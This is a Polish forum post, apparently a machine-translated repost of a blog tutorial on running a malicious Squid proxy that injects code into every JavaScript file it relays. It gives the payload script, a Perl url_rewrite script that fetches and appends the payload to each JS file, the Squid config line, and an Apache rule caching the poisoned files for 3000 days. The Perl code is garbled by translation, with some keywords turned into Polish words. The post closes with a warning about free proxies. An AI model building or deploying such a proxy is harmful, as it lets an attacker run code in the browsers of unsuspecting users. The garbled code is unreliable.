Ten post został ostatnio edytowany przez Mo Xiaowen 7.06.2015 23:19
Można to zrobić, po prostu modyfikując konfigurację SQUID
Czym jest SQUID?
Squid to oprogramowanie, które buforuje dane internetowe, odbiera żądania pobrania od użytkowników i automatycznie przetwarza pobrane dane. Gdy użytkownik chce pobrać stronę główną, może wysłać żądanie do Squida, poprosić go o pobranie w jego imieniu, następnie Squid łączy się ze stroną i żąda strony głównej, a następnie wysyła stronę główną użytkownikowi, zachowując kopię zapasową; gdy inni użytkownicy aplikują na tę samą stronę, Squid natychmiast wysyła zapisaną kopię zapasową do użytkownika, tak aby użytkownik czuł, że prędkość jest dość szybka. Squid może zastępować protokoły takie jak HTTP, FTP, GOPHER, SSL i WAIS, a Squid obsługuje to automatycznie, a Squid możesz skonfigurować Squid według swoich potrzeb, aby filtrować niepożądane rzeczy.
Squid może działać w wielu systemach operacyjnych, takich jak AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 itd.
Implementacja jest bardzo prosta:
1. Zainstaluj Squid na jednym serwerze Linux.
2. Zmodyfikować kod serwera, wstawić fragment naszego kodu do wszystkich przesłanych javascrip i wysłać go.
3. Ustaw czas pamięci podręcznej naszego zmodyfikowanego pliku js na maksymalny możliwy poziom.
Ta metoda dotyczy także stron internetowych z włączonym SSL – jeśli strona ładuje niebezpieczny zasób (np. jquery dla strony HTTP), większość przeglądarek wyda ostrzeżenie, ale niewiele osób zwraca na to uwagę.
Chema powiedział, że ponad 5 000 osób użyło jego proxy kilka dni po jego udostępnieniu, a większość osób używała go do złych rzeczy, ponieważ używali proxy, więc myśleli, że jest anonimowy i bezpieczny, ale nigdy nie spodziewali się, że serwer proxy też zrobi coś złego.
Stwórz swój złośliwy serwer proxy
Jeśli masz już serwer proxy Squid, będziesz też potrzebować serwera WWW, takiego jak Apache.
Krok 1: Utworzenie ładunku
Używam prostego skryptu jako demonstracji, aby wskazać wszystkie hiperłącza do mojej strony.
/etc/squid/payload.js
[mw_shl_code=javascrip usuń t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++) document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Krok 2: Napisz skrypt, który zainfekuje wszystkie pliki JS
/etc/squid/poison.pl [mw_shl_code=perl, prawda] #!/usr/bin/perl $|=1; $count = 0; $pid = $$; while(<>)
{ chrupać $_; if($_ =- /(.*.js)/i) { $url = $1; system ("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url"); system("chmod o+r /var/www/tmp/$pid-$count.js"); system("kot /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js"); drukuj "http://127.0.0.1:80/tmp/$pid-$count.js"; } else { drukuj "$_"; } $count++; }[/mw_shl_code]
Ten skrypt używa wget do pobrania oryginalnego javascrip strony i usunięcia pliku t, następnie dodaje kod do /etc/squid/payload.js i wysyła zmodyfikowany plik do klienta, podczas gdy ty musisz utworzyć katalog /var/www/tmp i pozwolić squid na zapisywanie plików. Ten katalog przechowuje zmodyfikowane pliki js.
Krok 3: Połącz powyższy skrypt ze Squid
Dodaj to do /etc/squid/squid.conf [mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Krok 4: Spraw, by cache nigdy nie zawiódł
/var/www/tmp/.htaccess [mw_shl_code=html,true] WygasaAktywne w dniu ExpiresDomyślny "dostęp plus 3000 dni"[/mw_shl_code]
To powie Apache'owi, by dał mu długi czas ważności, aż użytkownik posprząta swoją pamięć podręczną.
Jeśli podłączysz ten proxy, kliknięcie dowolnego hiperłącza przekieruje cię na moją stronę internetową, a pamięć podręczna nadal będzie istnieć, nawet jeśli później nie użyjesz proxy. Użyłem po prostu nieagresywnego ładunku i dzięki tej metodzie hakerzy mogą zrobić znacznie więcej. Przypominaj więc sobie i znajomym, by uważać na darmowe proxy.
|